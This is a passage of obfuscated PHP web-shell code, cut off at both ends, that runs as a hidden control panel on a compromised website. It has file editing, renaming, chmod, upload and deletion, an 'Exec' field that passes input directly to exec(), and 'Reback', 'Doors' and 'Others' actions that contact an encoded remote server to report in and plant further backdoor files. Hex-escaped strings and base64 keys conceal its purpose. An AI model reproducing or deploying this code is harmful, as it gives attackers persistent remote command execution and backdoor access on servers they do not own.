action="?type=3"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\x32\150\154\x62\x47\170\x66\x59\x32\71\x6b\x5a\x51\x3d\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <textarea class="form-control"cols="100"id="exampleFormControlTextarea1"name="file_content"rows="20"><?php echo htmlspecialchars($content); ?> </textarea></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 4) { $file_new_name = $_POST["\x66\151\x6c\145\137\156\x65\167\137\156\x61\155\145"]; if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . "\57" . $file_new_name); if ($rename_result) { echo "\x3c\144\151\x76\x20\143\154\x61\x73\163\x3d\42\141\154\x65\162\164\40\141\154\x65\162\164\x2d\x73\165\x63\x63\145\x73\x73\x22\40\162\x6f\154\x65\x3d\x22\141\x6c\x65\x72\164\42\x3e\x46\x69\x6c\145\x20\156\141\x6d\x65\40\x6d\x6f\x64\151\146\151\x65\x64\40\x73\165\x63\x63\x65\163\163\146\x75\154\154\x79\x21\x3c\x2f\144\151\x76\76"; $file_path = $now_path . "\x2f" . $file_new_name; } else { echo "\x3c\x64\x69\166\x20\x63\x6c\x61\163\163\x3d\x22\141\x6c\145\162\x74\40\141\154\145\162\164\x2d\144\141\156\147\x65\162\x22\x20\162\x6f\x6c\145\x3d\42\141\x6c\x65\162\164\42\x3e\x46\x61\151\x6c\x65\144\40\164\x6f\x20\155\x6f\x64\151\146\x79\x20\146\151\x6c\x65\x20\x6e\141\x6d\x65\41\74\x2f\144\x69\166\x3e"; } } ?> <div class="row"><form action="?type=4"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\150\154\x62\x47\x78\x66\131\62\71\x6b\x5a\121\75\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <input name="file_new_name"value="<?php echo basename($file_path); ?> "id="file_new_name"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 5) { $new_chmod = trim($_POST["\x6e\145\x77\137\x63\150\155\x6f\x64"]); if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo "\74\144\151\x76\40\x63\x6c\x61\x73\x73\x3d\x22\141\154\145\x72\x74\40\141\154\x65\x72\164\55\163\x75\143\x63\x65\163\163\42\x20\x72\x6f\154\145\75\x22\x61\154\145\162\x74\x22\76\106\151\154\x65\40\160\x65\162\155\151\163\163\151\157\x6e\163\x20\155\157\x64\x69\x66\151\x65\144\40\163\x75\143\x63\x65\163\163\146\x75\x6c\154\x79\41\x3c\57\x64\x69\166\x3e"; $old_chmod = $new_chmod; } else { echo "\74\144\x69\166\40\x63\x6c\141\x73\163\x3d\42\x61\x6c\145\x72\x74\40\141\x6c\x65\x72\164\x2d\144\x61\x6e\x67\x65\x72\x22\40\162\157\x6c\145\75\42\x61\154\x65\162\x74\42\x3e\106\x61\x69\154\x65\144\x20\164\x6f\40\x6d\157\144\151\146\x79\x20\146\x69\x6c\x65\x20\x70\145\162\155\x69\x73\x73\151\157\156\x73\41\x3c\x2f\144\x69\166\x3e"; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf("\45\x6f", $permissions), -4); } ?> <div class="row"><form action="?type=5"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\x68\154\142\x47\170\x66\x59\62\71\x6b\132\x51\75\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <input name="new_chmod"value="<?php echo $old_chmod; ?> "id="new_chmod"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 6) { $new_name = trim($_POST["\x6e\145\167\x5f\156\141\x6d\145"]); $new_content = trim($_POST["\156\x65\167\x5f\143\x6f\156\164\x65\x6e\x74"]); if (!empty($new_name)) { if (is_file($now_path . "\57" . $new_name)) { echo "\74\144\x69\x76\40\143\154\141\x73\163\x3d\x22\141\154\x65\162\164\x20\x61\154\x65\162\x74\x2d\x64\x61\156\147\145\x72\42\x20\162\x6f\x6c\145\x3d\x22\141\154\145\x72\x74\42\76\124\150\x65\40\x66\151\x6c\x65\40\x61\x6c\x72\145\141\144\171\x20\145\x78\x69\x73\164\x73\x21\x3c\x2f\x64\x69\166\x3e"; } else { $file = fopen($now_path . "\57" . $new_name, "\167"); if ($file) { if (fwrite($file, $new_content)) { echo "\x3c\x64\151\166\40\x63\x6c\x61\163\x73\x3d\x22\x61\x6c\x65\162\164\40\141\x6c\x65\162\164\x2d\x73\x75\143\x63\x65\x73\163\x22\40\162\157\154\145\x3d\x22\141\154\145\162\164\x22\x3e\106\151\154\145\x20\143\x72\145\x61\164\x65\x64\40\163\x75\x63\143\x65\x73\x73\x66\165\x6c\154\x79\x21\74\x2f\144\151\x76\x3e"; } else { echo "\74\144\x69\x76\x20\x63\154\141\163\163\75\42\141\x6c\145\162\x74\40\x61\x6c\145\162\x74\x2d\144\141\156\147\x65\x72\42\x20\x72\x6f\154\145\75\42\141\154\145\x72\x74\42\x3e\125\x6e\x61\142\154\x65\40\164\157\x20\167\162\x69\x74\x65\40\164\x6f\x20\x66\x69\x6c\x65\41\74\x2f\x64\x69\x76\76"; } fclose($file); } else { echo "\74\144\x69\x76\40\143\154\141\163\x73\75\x22\x61\154\x65\x72\164\40\141\x6c\x65\x72\x74\55\x64\x61\x6e\147\145\162\42\40\x72\x6f\x6c\x65\x3d\42\x61\x6c\145\x72\x74\42\76\125\x6e\141\142\x6c\x65\40\164\x6f\x20\157\160\x65\x6e\x20\146\151\x6c\x65\x21\74\x2f\144\x69\166\76"; } } } ?> <div class="row"><form action="?type=6"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\150\x6c\142\107\170\146\131\62\x39\x6b\132\121\x3d\75"]; ?> "type="hidden"><div class="form-group"><input name="new_name"value="<?php echo $new_name; ?> "id="new_name"class="form-control"placeholder="New File Name"></div><div class="form-group"><textarea class="form-control"cols="100"id="new_content"name="new_content"rows="20"placeholder="New File Content"><?php echo htmlspecialchars($new_content); ?> </textarea></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php } else { if ($type == 7) { $new_name = trim($_POST["\156\145\167\x5f\x6e\141\155\x65"]); if (!empty($new_name)) { if (!is_dir($now_path . "\x2f" . $new_name)) { if (mkdir($now_path . "\57" . $new_name)) { echo "\x3c\x64\151\x76\x20\x63\154\x61\163\x73\75\42\141\x6c\145\162\164\x20\141\154\145\162\164\55\x73\x75\143\x63\145\163\163\42\40\162\157\154\x65\x3d\x22\x61\154\145\162\x74\x22\76\104\151\x72\x65\143\164\x6f\x72\171\40\x63\x72\x65\141\x74\x65\x64\40\x73\x75\x63\143\145\163\163\x66\165\x6c\x6c\x79\x21\74\x2f\x64\151\166\x3e"; } else { echo "\x3c\144\151\x76\40\143\154\x61\163\163\75\42\141\154\145\x72\x74\x20\x61\154\x65\162\164\55\163\165\143\143\x65\x73\x73\42\40\x72\157\x6c\x65\x3d\x22\141\x6c\x65\162\x74\x22\76\104\x69\162\x65\143\164\157\162\x79\40\143\162\145\141\x74\x69\157\x6e\40\146\141\x69\154\x65\144\x21\x3c\57\144\151\166\x3e"; } } else { echo "\74\x64\x69\x76\40\143\154\x61\x73\x73\75\x22\x61\x6c\145\x72\x74\40\x61\154\145\162\x74\55\163\x75\x63\x63\145\x73\163\42\40\162\157\154\145\75\42\141\154\x65\162\x74\x22\76\x44\x69\x72\x65\143\x74\157\162\171\x20\x61\154\x72\145\x61\x64\x79\40\x65\x78\151\163\164\x73\x21\x3c\57\144\x69\166\76"; } } ?> <div class="row"><form action="?type=7"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\150\x6c\142\107\170\x66\131\x32\71\153\132\x51\75\x3d"]; ?> "type="hidden"> <input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"><div class="form-group"><input name="new_name"value="<?php echo $new_name; ?> "id="new_name"class="form-control"placeholder="New Folder Name"></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php } else { if ($type == 8) { $search_keys = trim($_POST["\163\145\x61\162\x63\150\137\x6b\x65\x79\163"]); $act = trim($_POST["\x61\x63\164"]); ?> <div class="row"><form action="?type=8"method="post"><div class="form-group"><input name="search_keys"value="<?php echo $search_keys; ?> "id="search_keys"class="form-control"placeholder="Search content"></div><button class="btn btn-success"type="submit">Search</button></form></div><?php if (!empty($search_keys)) { $result = array(); $file_list = findFilesWithContent($website_path, $search_keys, 0, 10); ?> <form action="?type=8"method="post"id="deleteForm"style="margin:1rem"><input name="act"value="deleteFiles"type="hidden"id="act"><div><?php echo "\74\x73\x70\141\156\40\x73\x74\x79\154\x65\75\47\143\x6f\x6c\x6f\x72\x3a\162\x65\144\x3b\47\x3e" . $search_keys . "\x3c\57\163\160\x61\156\x3e\40\x66\x69\154\x65\x73\40\154\151\x73\164\357\xbc\232\xa"; ?> </div><div><p><input name="allcheck"value="1"type="checkbox"id="allcheck"> all check <input value="delete"type="button"class="delBtn"></p></div><div><?php foreach ($file_list as $file) { $str = "\74\141\40\150\162\x65\146\75\42\x3f\160\141\164\x68\75" . $file . "\46\164\x79\x70\x65\x3d\62\x22\x20\x74\x61\x72\147\x65\164\75\42\x5f\142\154\x61\156\x6b\42\x3e" . $file . "\x3c\57\141\x3e"; echo "\x3c\x70\76\x3c\x69\156\160\165\164\40\x74\171\x70\145\75\x22\x63\150\145\143\153\x62\157\x78\42\x20\143\154\x61\x73\163\x3d\x22\151\164\x65\x6d\42\40\x6e\141\155\145\x3d\x22\146\x69\x6c\x65\x73\133\135\x22\40\x76\141\x6c\x75\x65\75\x22" . $file . "\x22\x2f\x3e\x26\156\x62\163\x70\x3b\46\156\x62\163\160\73" . $str . "\74\57\160\x3e"; } ?> </div></form><?php } if (!empty($act) && $act == "\x64\x65\x6c\x65\164\145\x46\x69\x6c\145\x73") { $file_list = $_REQUEST["\x66\x69\x6c\145\x73"]; foreach ($file_list as $k => $v) { deleteFile($v); } } } else { if ($_POST["\141\143\164"] == "\144\x65\154") { $delete_file_list = $_POST["\x63\150\x69\x6c\x64\x63\x68\145\143\x6b"]; if (!empty($delete_file_list)) { $count = 0; $fail_count = 0; foreach ($delete_file_list as $k => $v) { if (is_dir($v)) { $del_result = deleteDirectory($v); } else { $del_result = unlink($v); } if ($del_result) { $count++; } else { $fail_count++; } } if ($count > 0) { echo "\x3c\144\151\166\x20\x63\154\141\x73\163\x3d\42\141\x6c\x65\x72\x74\40\x61\x6c\x65\162\x74\55\x73\165\x63\x63\145\163\163\x22\x20\162\157\x6c\145\75\42\141\x6c\145\x72\x74\x22\x3e\x44\145\154\x65\164\x65\x20" . $count . "\x20\x66\x69\154\145\x73\x20\x73\x75\143\x63\x65\163\x73\x66\165\x6c\154\x79\41\x3c\57\144\x69\166\x3e"; } if ($fail_count > 0) { echo "\74\x64\151\x76\40\x63\x6c\x61\x73\x73\75\x22\x61\154\x65\x72\x74\x20\141\x6c\x65\162\164\55\144\x61\156\147\145\x72\42\x20\x72\x6f\x6c\145\75\42\141\x6c\x65\162\164\x22\x3e\104\145\154\x65\164\145\x20" . $fail_count . "\x20\x66\151\154\x65\x73\x20\146\141\151\x6c\x65\x64\x21\74\57\144\151\166\76"; } } } if ($_POST["\x61\143\164"] == "\x75\x70\x6c\157\141\144") { $targetFile = $now_path . "\57" . basename($_FILES["\x66\x69\154\145\124\157\125\160\x6c\157\141\144"]["\156\141\x6d\145"]); if (move_uploaded_file($_FILES["\146\x69\154\x65\124\x6f\x55\x70\154\157\x61\x64"]["\x74\155\x70\x5f\x6e\x61\x6d\x65"], $targetFile)) { echo "\74\x64\151\166\40\x63\154\141\163\163\x3d\x22\141\x6c\x65\x72\164\x20\141\x6c\x65\162\164\55\163\165\143\143\145\163\163\x22\x20\162\x6f\x6c\x65\75\42\141\x6c\145\162\x74\42\76\106\x69\x6c\145\40" . htmlspecialchars(basename($_FILES["\x66\151\154\x65\x54\x6f\125\160\x6c\x6f\141\144"]["\156\141\155\145"])) . "\x20\165\x70\x6c\157\x61\144\x65\x64\x21\x3c\57\x64\x69\x76\76"; } else { echo "\74\144\x69\166\x20\143\154\141\163\x73\x3d\42\141\154\x65\162\164\x20\x61\x6c\145\x72\164\x2d\144\x61\x6e\147\145\162\42\40\162\x6f\154\145\75\42\141\x6c\x65\x72\164\x22\76\x46\151\154\145\40\165\160\154\x6f\x61\144\40\x66\141\151\x6c\x65\144\41\x3c\57\x64\x69\166\x3e"; } } $file_list = scandir($now_path); $file_list = sortByFolder($now_path, $file_list); ?> <div class="row"><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?path=<?php echo $file_path; ?> "method="post"enctype="multipart/form-data"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\150\154\142\107\170\x66\x59\x32\x39\x6b\x5a\x51\x3d\x3d"]; ?> "type="hidden"> <input name="act"value="upload"type="hidden"> <input name="fileToUpload"type="file"id="formFileSm"class="form-control form-control-sm"style="width:200px;display:inline-block"> <button class="btn btn-sm btn-info"type="submit">Upload</button> <a href="?path=<?php echo $file_path; ?> &type=6"class="btn btn-sm btn-primary">Create File</a> <a href="?path=<?php echo $file_path; ?> &type=7"class="btn btn-sm btn-success">Create Folder</a> <a href="?path=<?php echo $file_path; ?> &type=8"class="btn btn-sm btn-warning">Search Files</a></form></div><div class="col-6"><form action="?path=<?php echo $file_path; ?> "method="post"enctype="multipart/form-data"><input name="exec_code"value=""class="form-control"style="display:inline-block;width:50%"> <input name="act"value="exec_code"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Exec</button></form></div></div></div><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?type=1"method="post"enctype="multipart/form-data"><input name="dir"value="<?php echo $path; ?> "class="form-control"style="display:inline-block;width:80%"> <input name="act"value="change_dir"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Change Dir</button></form></div><div class="col-6"></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\150\x6c\142\x47\170\x66\131\62\71\153\x5a\x51\75\x3d"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="reback"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\x33\x4a\166\x64\130\x41\x3d"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\x63\x32\150\x6c\142\x47\x78\x66\141\127\121\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\144\x48\x6c\167\x5a\121\x3d\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-success"type="submit">Reback</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\x32\150\154\x62\x47\x78\x66\131\x32\x39\x6b\x5a\x51\x3d\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="exec"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\x33\x4a\166\144\130\101\75"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\143\62\x68\x6c\x62\x47\x78\x66\141\x57\x51\75"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\x64\x48\x6c\167\132\121\x3d\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-warning"type="submit">Exec</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\150\154\x62\107\170\146\131\62\71\153\132\x51\75\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="others"type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\143\x32\x68\154\x62\x47\170\146\141\x57\121\75"]; ?> "type="hidden"> <input name="group_id_2"value="<?php echo $_SESSION["\x63\62\126\x6a\x62\x32\x35\153"]; ?> "type="hidden"> <input name="group_id_3"value="<?php echo $_SESSION["\x64\107\150\x70\x63\155\x52\x6e\x63\x6d\71\61\x63\101\75\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\144\110\x6c\x77\132\121\75\75"]; ?> "type="hidden"> <button class="btn btn-sm btn-info"type="submit">Others</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\x68\154\x62\x47\x78\x66\x59\x32\71\153\x5a\121\x3d\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="doors"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\63\112\x76\x64\x58\x41\75"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\143\62\x68\154\142\107\x78\146\141\x57\121\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\144\x48\x6c\167\132\121\x3d\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-danger"type="submit">Doors</button></form></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-12 col-sm-12"style="text-align:center;font-weight:700"><?php if ($_POST["\141\143\164"] == "\x73\150\x65\x6c\154") { if ($_POST["\164\x79\x70\x65"] == "\162\x65\x62\141\x63\153") { rebackAction($_POST, $pws, $now_site); } else { if ($_POST["\164\x79\x70\x65"] == "\x65\170\x65\143") { execAction($_POST, $pws, $now_site); } else { if ($_POST["\164\x79\160\145"] == "\x64\157\x6f\162\x73") { doorsAction($_POST, $pws, $now_site); stationAction($_POST, $pws, $now_site); } else { if ($_POST["\164\x79\x70\x65"] == "\157\x74\x68\x65\162\x73") { othersAction($_POST, $pws, $now_site); } } } } } if ($_POST["\141\143\x74"] == "\145\x78\x65\x63\137\x63\157\x64\145") { $exec_code = trim($_POST["\x65\x78\145\143\137\x63\157\144\145"]); exec($exec_code, $output, $returnVar); if ($returnVar === 0) { echo "\74\144\x69\x76\x20\163\x74\171\x6c\x65\x3d\x27\143\157\154\x6f\162\72\x20\147\x72\145\145\156\x3b\x66\157\156\x74\x2d\167\x65\151\x67\150\164\72\x62\x6f\154\x64\x3b\x27\x3e" . $exec_code . "\40\151\163\40\123\165\143\x63\145\163\x73\146\x75\154\x6c\171\x2e\x3c\x2f\x64\151\x76\x3e"; foreach ($output as $k => $v) { echo $v . "\74\x62\162\57\76"; } } else { echo "\74\144\151\x76\x20\163\x74\171\x6c\x65\75\x27\x63\x6f\154\x6f\162\x3a\40\x72\x65\144\73\x66\x6f\156\164\55\167\x65\x69\147\x68\164\72\x62\157\154\144\73\47\x3e" . $exec_code . "\x20\151\x73\40\x46\141\151\x6c\145\144\x3a" . $returnVar . "\56\74\x2f\144\151\166\x3e"; } } ?> </div></div></div><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\x68\x6c\x62\x47\x78\146\131\62\x39\x6b\x5a\x51\x3d\x3d"]; ?> "type="hidden"><div class="col-12"style="margin-bottom:1rem"><input name="act"value="del"type="hidden"> <button class="btn btn-xs btn-danger"type="submit">Delete</button></div><table class="table table-bordered"><thead><tr><th><div class="form-check"><input name="allcheck"value="1"type="checkbox"id="allcheck"class="form-check-input"></div></th><th>Name</th><th>Url</th><th>Size</th><th>Modify</th><th>Permission</th><th>Action</th></tr></thead><tbody><?php if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == "\x2e" || $v == "\56\56")) { $file_url = $now_path . "\57" . $v; ?> <tr><th><div class="form-check"><input name="childcheck[]"value="<?php echo $file_url; ?> "type="checkbox"class="form-check-input"></div></th><td><?php if (is_dir($file_url)) { echo "\74\141\x20\x68\x72\x65\x66\75\42\x3f\160\141\x74\x68\75" . $file_url . "\46\x74\171\160\145\x3d\x31\42\40\x73\164\x79\154\x65\75\x22\x63\x6f\154\x6f\162\72\x20\147\162\145\145\156\73\146\x6f\156\164\x2d\x77\145\151\147\x68\164\72\142\157\154\x64\x3b\42\x3e\12\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\74\x69\x20\x63\154\141\x73\163\x3d\42\x62\x69\40\142\151\55\x66\157\x6c\144\145\162\42\40\x73\164\171\154\145\x3d\x22\166\145\x72\x74\151\143\x61\x6c\55\x61\x6c\x69\x67\156\x3a\x20\155\151\x64\144\154\145\73\42\76\12\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\74\x73\166\147\x20\170\x6d\x6c\x6e\163\75\x22\x68\x74\x74\160\72\x2f\x2f\167\167\x77\x2e\x77\x33\56\x6f\162\147\x2f\x32\60\60\60\x2f\163\166\x67\42\40\x77\x69\144\x74\150\x3d\42\x31\x36\x22\x20\x68\x65\x69\x67\x68\164\x3d\42\x31\66\x22\40\x66\x69\x6c\x6c\x3d\x22\143\165\x72\x72\x65\x6e\x74\103\x6f\154\157\162\42\40\x63\x6c\141\163\163\75\42\x62\x69\x20\142\151\55\x66\157\154\x64\x65\x72\x22\x20\166\x69\x65\x77\102\x6f\170\x3d\x22\60\40\x30\40\x31\x36\x20\x31\66\x22\76\xa\x20\40\x20\40\40\40\40\40\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x3c\x70\x61\x74\150\40\x64\x3d\42\115\x2e\x35\64\40\63\x2e\x38\x37\x2e\x35\40\63\x61\x32\x20\x32\40\x30\x20\60\40\x31\40\62\55\62\x68\x33\x2e\x36\x37\62\141\x32\x20\x32\40\x30\x20\x30\x20\x31\40\61\56\64\61\64\x2e\x35\70\x36\154\x2e\x38\62\x38\56\x38\x32\x38\101\x32\40\x32\40\x30\40\x30\x20\60\40\x39\56\70\62\70\x20\x33\150\x33\56\x39\70\62\141\x32\x20\62\40\x30\40\60\40\61\40\61\x2e\71\x39\x32\x20\x32\56\x31\70\61\x6c\x2d\x2e\x36\63\x37\40\67\x41\62\40\x32\40\60\x20\60\40\x31\40\x31\63\56\61\67\64\40\x31\x34\110\62\56\70\62\x36\141\62\x20\x32\40\x30\40\60\40\61\x2d\61\56\71\71\61\55\x31\x2e\x38\x31\x39\154\x2d\56\66\x33\67\55\67\141\x31\56\x39\71\40\61\56\x39\71\x20\x30\x20\x30\x20\x31\x20\x2e\x33\64\62\55\61\x2e\63\61\172\115\62\56\x31\71\40\64\141\61\x20\x31\x20\x30\x20\60\x20\60\x2d\56\x39\x39\66\40\x31\56\60\71\154\x2e\x36\63\67\x20\x37\x61\61\x20\61\40\x30\x20\60\x20\x30\40\x2e\x39\71\65\x2e\71\x31\x68\x31\x30\56\x33\x34\x38\141\61\40\61\x20\x30\x20\60\x20\60\x20\x2e\x39\71\65\55\56\x39\61\x6c\56\66\63\67\x2d\x37\101\x31\40\x31\40\x30\40\x30\40\60\40\61\63\x2e\70\61\x20\x34\110\62\56\61\x39\x7a\x6d\x34\x2e\x36\x39\x2d\61\56\x37\60\67\x41\61\x20\61\x20\60\40\60\x20\60\x20\66\x2e\61\x37\x32\x20\x32\110\62\56\65\141\x31\x20\x31\x20\60\40\x30\x20\x30\55\x31\x20\x2e\x39\70\61\154\x2e\60\x30\66\56\61\x33\x39\103\x31\56\x37\x32\x20\x33\56\x30\64\x32\40\61\56\x39\65\x20\63\40\62\x2e\61\71\40\x33\150\x35\x2e\63\71\66\154\55\56\67\x30\67\55\56\67\x30\67\172\42\57\x3e\12\40\40\40\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\x3c\57\x73\166\x67\x3e\xa\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\40\x3c\57\151\x3e" . $v . "\74\57\141\x3e"; } else { echo "\74\x61\x20\150\162\145\x66\75\x22\77\x70\x61\164\150\75" . $file_url . "\x26\x74\x79\160\145\x3d\62\42\76" . $v . "\74\x2f\141\76"; } ?> </td><td><?php if (!is_dir($file_url)) { ?> <a href="<?php echo $now_url . "\x2f" . $v; ?> "target="_blank">click visit</a><?php } ?> </td><td><?php if (is_dir($file_url)) { echo "\74\x66\x6f\156\164\x20\143\157\x6c\x6f\162\x3d\42\x67\x72\145\145\x6e\x22\x20\x73\x74\171\154\x65\75\x22\146\157\156\x74\x2d\167\x65\x69\x67\150\x74\x3a\x20\142\x6f\154\144\x3b\x22\x3e\104\x69\162\145\x63\164\157\162\x79\74\x2f\x66\157\156\164\76"; } else { echo getFileSize($file_url); } ?> </td><td><?php $modificationTime = filemtime($file_url); echo date("\131\55\155\55\144\x20\110\72\x69\x3a\x73", $modificationTime); ?> </td><td><?php $permission = getFilePermission($file_url); if (strpos($permission, "\x77") !== false) { echo "\74\x66\x6f\x6e\x74\x20\x63\157\154\157\162\x3d\42\x67\162\x65\145\x6e\x22\x20\163\x74\171\x6c\x65\75\x22\146\157\x6e\164\55\x77\145\151\147\x68\x74\72\x20\x62\x6f\154\x64\x3b\x22\x3e" . $permission . "\x3c\x2f\x66\x6f\156\164\x3e"; } else { echo "\74\146\x6f\x6e\x74\x20\x63\x6f\154\157\162\75\42\162\145\x64\x22\x20\x73\x74\171\154\145\75\42\x66\x6f\x6e\x74\55\x77\x65\x69\x67\x68\164\x3a\x20\x62\x6f\x6c\x64\73\42\x3e" . $permission . "\x3c\x2f\146\x6f\156\x74\x3e"; } ?> </td><td><a href="?path=<?php echo $file_url; ?> &type=4"class="btn btn-xs btn-primary">Rename</a> <a href="?path=<?php echo $file_url; ?> &type=2"class="btn btn-info btn-xs">Edit</a> <a href="?path=<?php echo $file_url; ?> &type=5"class="btn btn-xs btn-warning">Chmod</a></td></tr><?php } } } else { ?> <tr><td colspan="4"style="text-align:center;color:red">No Files!</td></tr><?php } ?> </tbody></table></form></div><?php } } } } } } ?> </div><script>$(function(){$("#allcheck").click(function(){$("#allcheck").is(":checked")?$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!0)}):$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!1)})})})</script><script>$(function(){$("#allcheck").click(function(){$(".item").prop("checked",this.checked)}),$(".item").click(function(){$(".item").length==$(".item:checked").length?$("#allcheck").prop("checked",!0):$("#allcheck").prop("checked",!1)}),$(".delBtn").click(function(){var e=[];if($(".item:checked").each(function(){e.push($(this).val())}),0==e.length)return alert("please select files"),!1;$("#deleteForm").submit()})})</script></body></html><?php } goto hQgDL; IkKQx: function curlpost($url, $data) { $jsonData = json_encode($data); $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\x6f\156\x74\145\x6e\164\55\x54\x79\160\x65\72\40\x61\x70\160\154\x69\x63\141\x74\151\x6f\x6e\57\x6a\163\157\156", "\103\157\x6e\x74\x65\x6e\164\x2d\114\145\156\147\x74\x68\72\40" . strlen($jsonData))); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); $response = curl_exec($ch); $result = array(); if (curl_errno($ch)) { $result["\163\x74\x61\x74\x75\163"] = 0; $result["\155\163\x67"] = curl_error($ch); } curl_close($ch); $res = json_decode($response, true); $result["\x73\x74\x61\164\165\x73"] = $res["\x73\164\x61\164\x75\x73"]; return $result; } goto NCifJ; P3tPx: function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site) { $result = array(); $sf = crefile($second_file, $group2_code); $tf = crefile($third_file, $group3_code); $result["\163\x65\143\x6f\156\144\x5f\x75\x72\x6c"] = ''; $result["\164\150\151\x72\144\x5f\x75\x72\154"] = ''; if ($sf) { $result["\x73\x65\143\x6f\156\144\137\165\x72\154"] = $now_site . "\57" . $second_file; } if ($tf) { $result["\x74\x68\151\x72\x64\x5f\165\x72\154"] = $now_site . "\x2f" . $third_file; } return $result; } goto QFZm4; z3tac: error_reporting(0); goto epY3Y; z_Q2W: function rebackAction($data, $pweb, $now_site) { $group_id = $data["\x67\162\x6f\165\160\137\151\x64"]; $shell_id = $data["\x73\x68\145\x6c\x6c\x5f\x69\144"]; $shell_type = $data["\x73\150\x65\x6c\154\137\164\x79\x70\x65"]; $url = base64_decode($pweb) . "\x2f\145\x69\x6e\x64\145\170\x64\157\x6f\162\56\160\150\x70\x3f\141\x63\164\x69\157\156\75\162\x65\x62\141\x63\x6b\x26\x67\162\x6f\x75\160\x5f\151\144\75" . $group_id . "\x26\163\x68\145\154\x6c\x5f\x74\x79\x70\145\75" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $result_data = array(); $result_data["\163\150\145\154\154\x5f\x69\x64"] = $shell_id; $result_data["\x61\143\164\151\157\156"] = "\x72\x65\142\x61\143\153"; $save_url = base64_decode($pweb) . "\57\145\163\141\x76\x65\x2e\x70\150\x70"; if (isset($json_array["\x69\x6e\137\146\151\154\x65\163"]) && !empty($json_array["\151\x6e\x5f\x66\x69\154\x65\x73"])) { $wp_code = 